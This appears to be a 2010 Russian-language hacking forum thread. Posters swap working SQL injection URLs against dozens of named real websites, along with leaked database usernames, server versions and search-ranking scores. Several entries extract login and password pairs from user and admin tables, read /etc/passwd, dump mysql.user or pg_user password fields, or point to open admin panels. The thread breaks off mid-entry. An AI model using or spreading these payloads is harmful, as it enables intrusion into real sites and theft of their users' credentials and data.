http://www.ventoniemi.fi/faq.php?id=-4+union+select+1,2,concat_ws%280x3a,user%28%29,@@v ersion_compile_os,version%28%29%29,4
USER-admin@localhost
VERSION()-5.0.32-Debian_7etch12-log
OS()-pc-linux-gnu
PR-4
http://www.sora.fi/faq.php?id=-4+union+select+1,2,concat_ws(0x3a,user(),@@version _compile_os,version()),4 --
Копия высшего сайта.
USER-admin@localhost
VERSION()-5.0.32-Debian_7etch12-log
OS()-pc-linux-gnu
PR-4
http://www.faarbi.com/ar/news.php?do=view_detail&id=-1+union+select+1,2,concat_ws%280x3a,version%28%29, user%28%29,@@version_compile_os%29%20 --
USER-faarbic_faarbic@localhost
VERSION()-5.0.85-log
OS()-portbld-freebsd7.0
http://www.eigenhuismakelaar.nl/faq.php?id=-306+union+select+1,2
PR-2
http://winpyme.com/soporte/faq.php?id=-16+union+select+1,2,concat_ws%280x3a,user%28%29,ve rsion%28%29,@@version_compile_os%29,4,5 --
USER-aa2758@maria.es.34web.net
VERSION()-4.0.25
OS()-pc-linux-gnu
PR-3
ТИЦ-10
http://www.campanasdecocinatst.com.ar/faq.php?id=5+union+select+1,2,3,4,5 --
PR-2
http://www.sylvesterlawofgeorgia.com/spanish/faq.php?id=-1+union+select+1,concat_ws%280x3a,version%28%29,us er%28%29,@@version_compile_os%29,3,4 --
USER-sylveste_chuck@localhost
VERSION()-5.1.47-community-log
OS()-unknown-linux-gnu
http://myzuite.com/faq.php?id=-9+union+select+1,concat_ws%280x3a,version%28%29,us er%28%29,@@version_compile_os%29,3,4 --
USER-dinamik_57749@216.10.249.60
VERSION()-5.0.22-community-max-nt
OS()-Win32
http://www.globalhomologaciones.com/faq.php?id=-2+union+select+1,2,3,4,5%20 --
http://www.arredissima.com/faq.php?id=-20+union+select+1,concat_ws%280x3a,user%28%29,vers ion%28%29,@@version_compile_os%29,3,4,5,6,7 --
USER-mysqlconnect@192.168.1.32
VERSION()-5.0.51a-3ubuntu5.7-log
OS()-debian-linux-gnu
PR-3
ТИЦ-10
http://www.diaconos.com.br/faq.php?ident=-30+union+select+1,concat_ws%280x3a,user%28%29,@@ve rsion_compile_os,version%28%29%29,3,4 --
USER-diaconos_root@localhost
VERSION()-5.0.90-community
OS()-unknown-linux-gnu
PR-2
http://www.uhu.es/master-educomunicacion/faq.php?id=-9+union+select+group_concat%280x3a,version%28%29,u ser%28%29,@@version_compile_os%29,2,3,4%20--
USER-usuedu@webunix-1
VERSION()-5.0.45
OS()-sun-solaris2.10
PR-8
ТИЦ-30
http://www.vintil.ru/faq.php?id=-917+union+select+1,concat_ws%280x3a,version%28%29, 0x3a,user%28%29,@@version_compile_os%29,3,4,5%20 --
USER-u180296@10.8.0.113
VERSION()-5.0.90-log
OS()-portbld-freebsd7.2
http://www.td-signal.ru/faq.php?id=-19+union+select+1,2,concat_ws%280x3a,version%28%29 ,0x3a,user%28%29,@@version_compile_os%29,4,5 --
USER-u33374@10.8.1.32
VERSION()-5.0.90-log
OS()-portbld-freebsd7.2
http://hottoursite.ru/faq.php?id=-10+union+select+concat_ws%280x3a,version%28%29,0x3 a,user%28%29,@@version_compile_os%29,2 --
USER-hottouroot@localhost
VERSION()-5.0.45-log
OS()-redhat-linux-gnu
Брр... Зубы, кстати, заметил, у всех один админ.
http://www.zubnoiprotez.ru/faq.php?id=-3+union+select+1,concat_ws%280x3a,version%28%29,0x 3a,user%28%29,@@version_compile_os%29,3 --
USER-stomatsz_stomats@localhost
VERSION()-5.0.37
OS()-unknown-linux-gnu
http://www.master-zub.ru/faq.php?id=-4+union+select+concat_ws%280x3a,version%28%29,0x3a ,user%28%29,@@version_compile_os%29,2,3 --
USER-stomatsz_master@localhost
VERSION()-5.0.37
OS()-unknown-linux-gnu
http://www.moyzubnoi.ru/faq.php?id=-11+union+select+concat_ws%280x3a,user%28%29,@@vers ion_compile_os,version%28%29%29,2,3 --
USER-stomatsz_moyzubn@localhost
VERSION()-5.0.37
OS()-unknown-linux-gnu
http://www.mir-zubov.ru/faq.php?id=-11+union+select+1,concat_ws%280x3a,version%28%29,0 x3a%20,user%28%29,@@version_compile_os%29,3%20 --
USER-stomatsz_mirzubo@localhost
VERSION()-5.0.37
OS()-unknown-linux-gnu
http://www.clinica-zubov.ru/faq.php?id=-2+union+select+concat_ws%280x3a,version%28%29,0x3a %20,user%28%29,@@version_compile_os%29,2,3,4,5,6 --
USER-tomatsz_clinica@localhost
VERSION()-5.0.37
OS()-unknown-linux-gnu
http://www.stomats-zub.ru/faq.php?id=-12+union+select+concat_ws%280x3a,version%28%29,0x3 a%20,user%28%29,@@version_compile_os%29,2,3 --
USER-stomatsz_stomats@localhost
VERSION()-5.0.37
OS()-unknown-linux-gnu
Зубы, слава Богу, кончились.
http://www.tdtransformator.ru/faq.php?id=-386+union+select+1,2,concat_ws%280x3a,user%28%29,@ @version_compile_os,version%28%29%29,4,5 --
USER-u17834@10.8.0.172
VERSION()-5.0.90-log
OS()-portbld-freebsd7.2
ТИЦ-20
ПР-1
http://www.indianprairiecommunity.org/go.php?_ID=-2290+or(1,1)=(select+count(0),concat((select+conca t(email,char(58),password)+from+ciab_member+limit+ 0,1),floor(rand(0)*2))from(information_schema.tabl es)group+by+2)--++
компания "А и Р" продажа холодного оружия
http://www.zlatoust-air.ru/katalog.php?h_id=1+and+1=2+union+select+concat_ws( char(58),@@version,user(),database(),@@version_com pile_os),2+--
version : 5.1.41-log
user : zlatoust_zmaster@localhost
database : zlatoust_master
os : pc-linux-gnu
Code:
http://www.keypoints.kz/index.php?page=article&id=5+and+1=2+UNION+SELECT+1,2,3,4,5,6,7--
keypoints-kz@localhost:5.0.51a-24+lenny2-log:keypoints-kz
тиц 10 pr3
http://www.institutodeempresa.org/
http://www.institutodeempresa.org/IE/site/php/en/school_communication_detail.php?id_new=111+union+s elect+1,group_concat(login,char(58),password),3,4, 5,6,7,8,9,10,11+from+usuarios
Version : 5.0.83-log
OS : FreeBSD 7.1
PR-7
тИЦ-80
emillord
13.07.2010, 14:15
http://www.highcountryarchery.net/product.php?prod_id=-5+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1--+
Вывод таблиц
http://www.highcountryarchery.net/product.php?prod_id=-5+UNION+SELECT+1,TABLE_NAME,3,4,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1%20FROM%20INFORMATION_SCHEMA.TABLES %20--
ТИЦ10(R2) PR3
OS: unknown-linux-gnu
User: highcou1_marttie@localhost
Version: 5.1.47-community-log
Database: highcou1_hca
http://www.xtracpads.com/products.php?prod_id=-4+UNION+SELECT+1,2,3,4,5--+
Вывод таблиц
http://www.xtracpads.com/products.php?prod_id=-4+UNION+SELECT+1,TABLE_NAME,3,4,5+FROM%20INFORMATI ON_SCHEMA.TABLES--+
Пользователи
http://www.xtracpads.com/products.php?prod_id=-4+UNION+SELECT+1,id,3,4,password+FROM%20members%20 LIMIT%200,1--+
ТИЦ10 PR4
OS: pc-linux-gnu
User: xtrac@apache2-jiffy.raiders.dreamhost.com
Version: 5.1.39-log
Database: test
http://www.feec.org
http://www.feec.org/Informacio%20Gral/Refugis/refugi.php?idRef=-321+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,aes_decryp t(aes_encrypt(group_concat(user,char(58),password) ,1),1),46,47,48,49+from+mysql.user
PR-5
-PRIVAT-
13.07.2010, 15:20
http://www.chel-volga.ru/avto.php?id=26&pid=-74+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(), @@version_compile_os,version()),8,9,10,11,12 --
USER-db_chel-volga@localhost
VERSION()-5.0.45
OS()-redhat-linux-gnu
ТИЦ-10
http://sdc-sochi.ru/avto.php?id=-24+union+select+1,2,3,concat_ws(0x3a,user(),@@vers ion_compile_os,version()),5,6,7,8,910,11,12,13,14, 15,16,17,18 --
USER-gb_sdcs@81.177.32.14
VERSION()-5.0.70-log
OS()-pc-linux-gnu
http://www.baw-fenix74.ru/avto.php?id=44&pid=-138+union+select+1,2,3,5,6,7,concat_ws(0x3a,user() ,@@version_compile_os,version()),9,10,11,12,13 --
USER-db_chel-volga@localhost
VERSION()-5.0.45
OS()-pc-linux-gnu
http://newsprinter.ru/exc.php?e_id=-2+union+select+1,2,concat_ws%280x3a,user%28%29,@@v ersion_compile_os,version%28%29%29,4,5,6,7,8,9,10, 11,12%20 --
USER-eot_eot@localhost
VERSION()-5.0.90
OS()-portbld-freebsd7.2
http://www.korspb.ru/auto.php?id=-56+union+select+1,2,3,concat_ws%280x3a,user%28%29, @@version_compile_os,version%28%29%29,5,6%20 --
USER-u60685@78.108.81.101
VERSION()-5.0.77
OS()-portbld-freebsd7.0
http://www.zdeo.ru/parts/auto.php?cat=TR&id=-46+union+select+1,concat_ws%280x3a,user%28%29,@@ve rsion_compile_os,version%28%29%29,3,4,5,6,7,8,9,10 %20--
USER-zdeo_user@localhost
VERSION()-5.0.67-0ubuntu6.1
OS()-debian-linux-gnu
ТИЦ-20
PR-3
http://www.futureevents.ru/event.php?id=-161+union+select+1,2,3,4,5,concat_ws%280x3a,user%2 8%29,@@version_compile_os,version%28%29%29,7%20--
USER-marryme_mysql@194.85.92.180
VERSION()-5.1.36-log
OS()-portbld-freebsd7.2
ТИЦ-20
http://www.allbalances.ru/auto.php?id=-2+union+select+1,2,3,concat_ws%280x3a,user%28%29,@ @version_compile_os,version%28%29%29,5,6,7,8,9,10, 11,12,13,14%20 --
USER-allbalances@localhost
VERSION()-5.1.30
OS()-portbld-freebsd7.1
ТИЦ-210
PR-2
http://www.aeroprize-n.ru/dom.php?ID=-182+union+select+1,2,concat_ws%280x3a,user%28%29,@ @version_compile_os,version%28%29%29 --
USER-gb_aeroprize@10.0.1.20
VERSION()-5.0.85-community-nt-log
OS()-Win64
http://www.clas.ru/people.php?id=-12293+union+select+1,2,3,4,5,6,7,concat_ws%280x3a, user%28%29,@@version_compile_os,version%28%29%29%2 0 --
USER-u8122(sobaka)10.8.0.42
VERSION()-5.0.90-log
OS()-portbld-freebsd7.2
ТИЦ-180
http://www.mobil-land.ru/support.php?action=detail&id=-6472+union+select+1,2,3,4,5,concat_ws%280x3a,user% 28%29,@@version_compile_os,version%28%29%29,7,8,9, 10%20 --
USER-bustruck_mysql@10.1.43.182
VERSION()-4.1.22-log
OS()-portbld-freebsd6.2
ТИЦ-30
PR-2
Национальный информационный сервис
http://www.pulset.ru/all_citys.php?id_city=-116+and+1=2+union+select+1,2,concat_ws(char(58),@@ version,user(),database(),@@version_compile_os),4+--
version : 5.1.45-log
user : mediabro_user@localhost
database : mediabro_dbname
os : portbld-freebsd8.0
winstrool
14.07.2010, 09:36
http://www.atkgames.com/play.php?id=-44+union+select+1,concat_ws(0x3a,username,password ),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21 ,22,23+from+atk_users--&category=featured
http://www.atkgames.com/admin/ - обязательно посмотрите исходник страници, админ там просто жжет :-D
winstrool
14.07.2010, 12:44
http://webinside.pl/artykul.php?id=7074+union+select+1,2,3,4,5,concat_ ws(0x3a,version(),DATABASE(),user()),7,8,9,10,11
4.1.22-standard-log:webinside_portal:webinside_admins@localhost
ТИЦ 10 PR 5
-----
http://www.solidsolutions.com.au/view_products.php?cat=-14+union+select+1,concat_ws(0x3a,version(),DATABAS E(),user()),3--
5.0.84-log:solidp2_db:solidp@10.194.10.132
PR 3
//moder: имя таблиц писать не нужно если кому нужно будет то он сам вытащит.
http://www.dezmarket.ru/foto.php?id=7+union+select+1,2,concat_Ws(0x3a,vers ion(),database(),useR(),@@version_compile_os),4,5&open=1
4.0.27-MAX-LOGEZMARKET_DEZMEZMARKET_DEZM@V45.VALUESHOST.RU:UN KNOWN-FREEBSD4.7
Code:
http://www.sailnet.com/list_server/read_messages.php?id=-274090+UNION+SELECT+1,concat_ws%280x3a,user%28%29, version%28%29,database%28%29%29,3,4,5--
Version: 5.0.77-log
Database: listdata
Username: root@sailnet.com
Google PR: 5
winstrool
14.07.2010, 19:50
http://www.osmr.nsw.
gov
.au/state_of_research/science/view.php?id=-689+union+select+1,unhex(hex(concat_ws(0x3a,user() ,database(),version()))),3,4,5,6,7,8,9,0,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--
patrick@localhost:halledit:4.1.11-Debian_4sarge7-log
PR 6
-PRIVAT-
14.07.2010, 20:53
Высокопиаристые скули
http://realty.south.ru/dom.php?id=-217+union+select+concat_ws%280x3a,version%28%29,@@ version_compile_os,user%28%29%29%20 --
version(),@@version_compile_os,user()-5.0.67ortbld-freebsd7.1:kubanregionru@78.108.81.221
ТИЦ-110
PR-4
http://amkar.properm.ru/info.php?id=-12+union+select+1 --
ТИЦ-750
PR-5
Посещаемость-Высокая
http://www.analisi.ru/info.php?id=-10+union+select+1,concat_ws%280x3a,version%28%29,@ @version_compile_os,user%28%29%29%20,3,4%20--
version(),@@version_compile_os,user()-5.0.45ortbld-freebsd6.2:analisi@localhost
ТИЦ-60
PR-3
http://novikovi.info/man.php?id=-22+union+select+concat_ws%280x3a,version%28%29,@@v ersion_compile_os,user%28%29%29%20,2,3,4 --
version(),@@version_compile_os,user()-5.0.90-logortbld-freebsd7.2:u84343@10.8.0.77
http://www.islamcivil.ru/cat.php?id=-1+union+select+1,2,3,4%20--
ТИЦ-210
PR-4
http://www.nibulon.com/r/sport.php?id=-3401259+union+select+concat_ws%280x3a,version%28%2 9,@@version_compile_os,user%28%29%29%20%20--
version(),@@version_compile_os,user()-5.0.67-0ubuntu6-log:debian-linux-gnu:nibulon_31@localhost
ТИЦ-60
PR-4
http://www.horoskopa.com/sex.php?id=-10+union+select+1,2,3,4,5,6,7,password,9,10,11,12, 13,14,15,16,17,18+FROM%20Admins%20--
PR-4
http://www.promocionlaspalmas.com/prensa.php?fot_seccion=3&id=-1387+union+select+1,2,concat_ws%280x3a,version%28% 29,user%28%29%29,4,5,6,7,8 --
PR-5
version(),@@version_compile_os,user()-4.0.16-logromolp@localhost
Находка Медиа Групп
http://www.nakhodkamedia.ru/news.php?news_id=-1275+and+1=2+union+select+1,2,concat_ws(char(58),v ersion(),user(),database(),@@version_compile_os),4 ,5--
vesion : 5.0.91-community-log
user : nakhodk0_user@localhost
database : nakhodk0_db
os : unknown-linux-gnu
http://www.webms.org/maket001/news.php?id_new=-5+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os)
5.0.87-percona-highperf-log:a6120_makets:a6120_makets@10.0.1.17:unknown-linux-gnu
emillord
15.07.2010, 03:09
http://www.chestnutstreetdistrict.com/view.php?id=-13+union+select+1,concat_ws%280x3a,@@version_compi le_os,user%28%29,version%28%29,database%28%29%29,3 ,4,5,6,7,8,9,0,1,2--+
PR4
pc-linux-gnu:dbo240820474@localhost:4.0.27-standard:db240820474
http://houseofdavidministry.com/teachings/view.php?id=-31+UNION+SELECT+1,concat_ws%280x3a,@@version_compi le_os,user%28%29,version%28%29,database%28%29%29,3 ,4,5,6--+
PR3
sun-solaris2.91015354@localhost:4.1.22-standard-log1015354
http://pavlodar-auto.kz/info/view.php?id=-90+UNION+SELECT+1,2,3,4,concat_ws%280x3a,@@version _compile_os,user%28%29,version%28%29,database%28%2 9%29,6,7,8,9,0--+
ТИЦ10 PR2
unknown-linux-gnu:autod960_PavDB@localhost:5.0.81-community:autod960_PavlodarDB
Таблицы
http://pavlodar-auto.kz/info/view.php?id=-90+UNION+SELECT+1,2,3,4,TABLE_NAME,6,7,8,9,0%20FRO M%20INFORMATION_SCHEMA.TABLES%20LIMIT%206,10%20--
ms_access...
http://www.musigi-dunya.az/new/read_magazine.asp?id=333+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14+from+"table_name"
PR-5
тИЦ-90
-------------
http://www.ultra-t.ru/index.cfm?page=product&objectid=-67+union+select+1,2,password,4,5,6,7,8,9,10,11,12, 13+from+users&key=1&group=1
PR-2
тИЦ-20
-------------
http://www.geoing.org/artikullm.asp?id=-56+union+select+1,pass,3,4,5,6,7+from+user&gj=2&m=20
(username-admin)
http://www.geoing.org/admin
ФИЛАРНОМИЯ
http://www.filarmonia.e-burg.ru/photo/index.php?comm=-100+AND+1=2+union+select+concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os)+--
version : 5.1.37-1ubuntu5.1
user : ph@192.168.0.25
database : PhCustom
os : debian-linux-gnu
winstrool
15.07.2010, 14:04
http://www.gaga.pl/karta_modelka.php?id=-200+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6,7,8,9,0,11,12,13,14,15,16--&lng=en
gaga@localhost:gaga:5.0.90-log
PR 4
-PRIVAT-
15.07.2010, 16:32
http://www.bimeda.com.ar/faq.php?id=-1052+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0,1%20--
PR-2
http://www.astrum.com.mx/faq.php?id=-8+union+select+1,concat_ws%280x3a,version%28%29,us er%28%29%29,3,4,5,6,7%20--
PR-4
version(),@@version_compile_os,user()-5.0.77:root@localhost4
http://www.arctic-adventure.dk/tour.php?id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12 --
PR-5
ТИЦ-10
http://camplajolla.org/tour.php?id=-161+union+select+1,2,concat_ws%280x3a,version%28%2 9,user%28%29,@@version_compile_os%29,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,0,1
PR-2
version(),@@version_compile_os,user()-5.1.39-log:clj@jubjub.dreamhost.comc-linux-gnu
http://www.kentbankhead.com/web/tour.php?id=-23+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,v ersion%28%29,user%28%29,@@version_compile_os%29,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5, 6,7,8,9,0%20--
PR-1
http://www.southworth.com/page.php?id=-130+union+select+1 --
PR-5
ТИЦ-10
http://www.francorp.ae/reply.php?id=-1+union+select+1,2,group_concat(user_name,char(58) ,user_password),4,5+from+admin_login&threadid=1
+ PMA без пароля
http://www.francorp.ae/myadmin/
http://www.mygetex.com/index.php?pid=-210+union+select+1,2,3,4,concat_ws(concat(char(32) ,char(58),char(32)),user(),version(),database(),@@ version_compile_os),6,7,8,9,10,11,12,13,14,15,16
aka dexter
16.07.2010, 06:48
Code:
http://www.niburu.nl/viewinstelling.php?id=-14+union+select+1,2,3,concat_ws(char(58),version() ,user(),database(),@@version_compile_os),5,6,7,8,9--
Version: 4.1.21-standard
User: root@localhost
Database: niburu_core
Os: pc-linux-gnu
PR - 5
ТИЦ - 10
Code:
http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,concat_ws(char(58),version(),user(),database(),@ @version_compile_os),5,6,7+--+
Version: 5.0.70-log
User: gb_dinamo@10.0.1.31
Database: gb_dinamo
Os: pc-linux-gnu
тИЦ — 150
PR — 3
Официальный сайт Хоккейного Клуба Кристалл (Саратов)
http://www.kristall-saratov.ru/news.php?id=-1444+and+1=2+union+select+1,2,3,4,concat_ws(char(5 8),@@version,user(),database(),@@version_compile_o s)+--
version : 4.1.25-log
user : kristal4_kristal@localhost
database : kristal4_kristall
os : portbld-freebsd6.3
http://www.kristall-saratov.ru/news.php?id=-1444+and+1=2+union+select+1,2,3,4,concat_ws(char(5 8),name,pass)+from+users+limit+0,1--
http://www.zima-samara.ru/company.php?id_s=80+union+select+1,2,3--
/admin
login:admin
moder//пароли и хеши не выкладываем
Server = Apache
Version = 5.0.90-log
Powered by =
Attack Type = SQL Union Injection
Current User = u166318@10.8.0.165
Current Database = u166318
Supports Union = yes
Union Columns = 3
KENT1994
16.07.2010, 23:58
Code:
http://www.willisbrazolot.com/profiles.php?staff_id=%271 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8--
Host IP: 69.156.240.29
Web Server: Apache
Powered-by: PHP/5.2.12
DB Server: MySQL unknown ver
Current DB: main_willisbrazolot_com
Code:
http://www.robinhoodtech.com/rht/team?staff_id=%2714 AND %True_Expression%
Host IP: 208.90.98.3
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.1.6
DB Server: MySQL
Code:
http://www.indyjuniors.com/staffDetail.php?staff_id=%2729&staff_name=%27Nick% 20Wolf AND %True_Expression%
Host IP: 209.43.117.213
Web Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) DAV/1.0.3 PHP/4.3.10
Powered-by: PHP/4.3.10
DB Server: MySQL
Code:
http://www.slicedgaming.com/blogs.php?staff_id=%275 UNION ALL SELECT 1,%String_Col%,3,4,5--
Host IP: 67.205.52.74
Web Server: Apache
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: slicedgaming
http://recerca.upf.edu/taln/people_detail.php?pid=19+union+select+1,2,3,versio n(),5,6,7
----
http://www.ieb.ub.edu/web/miniweb.php?idMenuMiniWeb=77&Id=-535+union+select+1,2,version(),4,5,6&Titulo=%3EII%20Summer%20School%20in%20Public%20Eco nomics (сайт уже был, нo другой поддомен )
colorist
17.07.2010, 06:47
Специально для ньюсмейкеров :-D
Тому кто найдет LFI SQL inj в подарок !!!
http://www.ura.ru/blog/inside.php?id=-69'+union+select+1,2,version(),4,5+--+
@@version = 5.0.32-Debian_7etch8-log
http://www.ura.ru/admin/ -- админка
http://www.ura.ru/blog/inside.php?id=-69'+union+select+1,2,load_file('/etc/passwd'),4,5+from+mysql.user+--+
---
http://demotivation.ru/slideshow.php?id=ejsw2f6mcbrz&v=cool&dt=1279328398+and+1=0+union+select+version()+--+
Code:
http://shop.dnbw.kr/goods_detail.php?goodsIdx=-289+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user()),5,6,7--
5.0.27-standard-log:shop:shop@localhost
http://shop.dnbw.kr/admin/
пасс в открытом виде лежит..
http://www.islandsanctuary.com.mt/main.php?mid=20&lid=-160+union+select+1,2,3,4,5,concat_ws(concat(char(3 2),char(58),char(32)),user(),version(),database(), @@version_compile_os,@@datadir,@@tmpdir,@@basedir) ,7,8,9,10,11,12
-----
http://www.babyline.com.mt/product-details.php?id=-310+union+select+1,2,concat_ws(concat(char(32),cha r(58),char(32)),user(),version(),database(),@@vers ion_compile_os,@@datadir,@@tmpdir,@@basedir),4,5,6 ,7,8,9
------
шоп
http://www.digitalzone.com.mt/main.php?page=prodlist&catId=-92+union+select+1,concat(user(),char(58),version() ,char(58),database(),char(58),@@version_compile_os ),3,4
-----
http://www.micc.org.mt/news.php?type=2&id=146+and+1=0+union+select+1,2,3,4,5,6--
kislovodsk.org городской интернет-портал
http://www.kislovodsk.org/kurort/?id=-31+and+1=2+union+select+1,concat_ws(char(58),@@ver sion,user(),database(),@@version_compile_os),3,4,5 ,6,7,8--
version : 5.0.26-log
user : idmcru@localhost
database : idmcru
os : pc-linux-gnu
5.0.45-community-nt
Code:
http://www.smmad.ma/annuaire/index.php?page=8&id_cat=-173+union+select+1,2,version(),4,5,6,7,8,9%20--+
blind,version=4
Code:
http://coa.counciloftheamericas.org/group.php?id=10+and+SUBSTRING%28@@version,1,1%29=4
Code:
http://www.as-coa.org/group.php?id=22+AND+SUBSTRING%28@@version,1,1%29=4
winstrool
18.07.2010, 12:46
4.1.24-MAX-LOGRONVUS@97.74.144.100RONVUS
_http://pronv.us/catalog.php?id_cat=-14+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,10--&sm=14
PR 1
---
4.1.22-standard-log:356371_artlounge@172.16.11.28:356371_artlounge
_http://artlounge.net/ea_inside.php?id_cat=-7+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3--&id_item=64
PR 3
Moder : используй кнопку edit
-PRIVAT-
18.07.2010, 19:21
http://www.postbranding.ru/book.php?id=-3+union+select+1,2,concat_ws(0x3a,version(),@@vers ion_compile_os,user()) ,4,5,6 --
ТИЦ-10
PR-3
http://www.law.kuleuven.be/icri/people.php?id=-127+union+select+1,group_concat%28table_name%29,3, 4,5,8,10,1,2+from+information_schema.tables%20--
ТИЦ-325
PR-8
http://www.mediagroup.com.ua/promo.php?id=-65+union+select+1,concat_ws%280x3a,email,pwd%29,3, 4+from+partners --
ТИЦ-50
PR-3
http://redcarpet.daylife.com/people.php?id=-204000000000186367+union+select+1,2 --
ТИЦ-325
PR-7
Боян
PR-4
http://cathedralhillpress.com/book.php?id=-4+union+select+1,2,3,4,5 --
PR-3
http://www.icss.ac.ru/books/book.php?id=-47+union+select+1,2,3,4,5,6,7,8,9 --
ТИЦ-375
PR-5
Боян
PR-6
Konqi : провер антибоян-oм прежде чем постить.
KENT1994
19.07.2010, 23:41
сегодня почитал книгу о sql и решил попробовать на деле...
Code:
http://www.ccfrussia.ru/index.php?mod=n_article&n_id=304 +union+select 1,2,3,4,%String_Col%,6,7,8,9--
тИЦ — 80
PR — 5
Host IP: 88.198.48.135
Web Server: Apache/2.2.13 (Fedora)
Powered-by: PHP/5.2.9
DB Server: MySQL >=5
Current DB: cc
шоп
http://bb.rusbic.ru/?tc=16001&sp=0805&ii=3276+and+1=0+union+select+1,null,null,null,cast (version() as int),null,null,null,null,null,null,null,null,null, null,null,null,null,null
http://bb.rusbic.ru/?tc=16001&sp=0805&ii=3276+and+1=0+union+select+1,null,null,null,pass wd::int,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null+from+pg_user
version() : PostgreSQL 8.3.9 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
www.aa.org.lv
Code:
http://www.aa.org.lv/news.php?id=-426+union+select+concat(version(),0x3a,0x3a,databa se(),0x3a,0x3a,user()),2,3,4,5+--+
Version: 4.1.14
User: aaorg@localhost
Database: aaorg
OS: pc-linux-gnu
Users:
Code:
http://www.aa.org.lv/news.php?id=-426+union+select+concat(login,0x3a,passwd),2,3,4,5 +from+users+limit+0,1+--+
MD5(Unix)
Code:
http://www.rdclab.co.za/product.php?id=-1+union+select+1,2,concat_ws(char(58),version(),us er(),database(),@@version_compile_os),4,5+--+
Version: 5.0.51a-24+lenny4
User: rdclab@dedi31.cpt2.host-h.net
Database: rdclab
Os: debian-linux-gnu
тИЦ — 10
PR — 2
-PRIVAT-
20.07.2010, 16:04
http://www.longlines.com/wireless/phones/phone.php?id=-15+union+select+1,2,group_concat%28table_name%29,4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1+from+information_schema.tables%20--
ТИЦ-10
PR-4
http://www.collectivelens.com/profile.php?id=-221+union+select+1,2,3,4,5,version(),7,8,9,10,11,1 2,13--
4-й мускул, но присутствует форум phpbb со стандартными таблицами. На форуме 1к юзеров.
Marine Geoscience Data System
http://www.marine-geo.org/tools/search/download.php?data_uid=267393+union+select+version( ),null&client=DataLink
version() : PostgreSQL 8.2.15 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20080704 (Red Hat 4.1.2-46)
user : anonymous
current_database() : mgds
//работаем с information_schema
http://www.marine-geo.org/tools/search/download.php?data_uid=267393;select+null,null+from +information_schema.tables;&client=DataLink
//узнаем имена доступных баз (postgres, usap-drupal...)
http://www.marine-geo.org/tools/search/download.php?data_uid=267393;select+datname,null+f rom+pg_database+limit+1+offset+1;&client=DataLink
PR-6
DezMond™
20.07.2010, 18:41
trikota.r52.ru тиц 10
Code:
http://trikota.r52.ru/catalog?action=manufact&manufact=-9+union+select+1,user(),3,4,5,6,7,8,9+--+
menu-asz.hu
Code:
http://menu-asz.hu/main/place.php?action=pizza&placeid=113&accatid=-859+union+select+1,2,table_name,4,5,6,7,8,9+from+i nformation_schema.tables+--+
spartak.by пр4 тиц250
Code:
http://www.spartak.by/ru/press/news/-77+union+select+1,2,3,4+--+/
grief.lealta.ru
Code:
http://grief.lealta.ru/index.php?module=News&do=View&nid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18+--+
fuko.ru пр3 тиц10
Code:
http://www.fuko.ru/show_cat2.php?grid=-5778'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17+--+
mial.fas.sfu.ca пр5
Code:
http://mial.fas.sfu.ca/newsItem.php?id=-749+union+select+1,concat_ws(0x3a3a,MemberID,First Name,LastName,Username,Email,Password,SuperUser,Ho mePageURL),3,4,5,6,7,8+from+Personal+where+SuperUs er=1+limit+1,1+--+
surreyfoundation.org пр4 тиц10
Code:
http://www.surreyfoundation.org/showpage.php?id=115+uNIon+sELEct+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27+--+
okonremont.ru пр3 тиц80
Code:
http://www.okonremont.ru/page.php?pid=-2'+union+select+1,2,user(),4,5+--+
easy-sun.ru пр2 тиц10
Code:
http://easy-sun.ru/show_cart2.php?&new=-5166'+uNIon+sELEct+1,2,3,user(),5,6,7,8,9,10,11,12 ,13,14,15,16,17+--+&k=1
ortomed.ru пр2
Code:
http://ortomed.ru/osnov.php?idstat=-51'+union+select+user()+--+&idcatstat=17'
samara.pdamarket.ru пр1
Code:
http://samara.pdamarket.ru/show_cat2.php?grid=-65+union+select+user()+from+admin+--+
shop-cctv.ru пр1 тиц10
Code:
http://shop-cctv.ru/osnov.php?idstat=-59'+union+select+user()+--+&idcatstat=22
lvfo.org пр5
Code:
http://www.lvfo.org/index.php?option=com_calendar&show=detail&agid=6'+union+select+1,2,3,4,5+--+
hobby.rin.ru пр3 тиц120
Code:
http://hobby.rin.ru/cgi-bin/print.pl?id=29'+union+select+user+from+mysql.user+--+
daily-calcio.com пр3 тиц10
Code:
